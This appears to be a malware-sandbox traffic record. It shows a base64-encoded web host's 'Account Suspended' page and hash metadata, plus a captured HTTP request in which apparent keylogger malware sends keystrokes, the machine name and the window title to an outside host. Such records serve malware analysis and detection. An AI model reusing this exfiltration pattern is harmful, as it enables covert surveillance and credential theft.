Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:55%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Sun, 04 Dec 2016 10:55:37 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...